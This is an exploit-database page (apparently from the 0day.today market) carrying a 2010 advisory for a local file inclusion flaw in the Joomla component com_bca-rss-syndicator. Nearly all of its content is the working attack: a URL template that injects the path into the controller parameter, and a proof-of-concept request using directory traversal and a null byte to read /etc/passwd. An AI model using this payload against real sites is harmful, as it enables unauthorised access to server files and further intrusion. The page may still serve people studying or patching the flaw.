[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_bca-rss-syndicator LFI Vulnerability

Author
Vrs-hCk
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11632
Category
web applications
Date add
05-04-2010
Platform
php
=========================================================
Joomla Component com_bca-rss-syndicator LFI Vulnerability
=========================================================

================================================================================================
 
 Title    : Joomla Component com_bca-rss-syndicator LFI Vulnerability
 Date     : Monday, 05 April 2010 (Indonesia)
 Author   : Vrs-hCk
 Contact  : ander[at]antisecurity.org
 Blog     : http://c0li.blogspot.com/
 
 ================================================================================================
 
 [+] Exploit
 
     http://[site]/[path]/index.php?option=com_bca-rss-syndicator&controller=[LFI]
 
 [+] PoC
 
     http://localhost/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../etc/passwd%00
 
 ================================================================================================



#  0day.today [2024-10-06]  #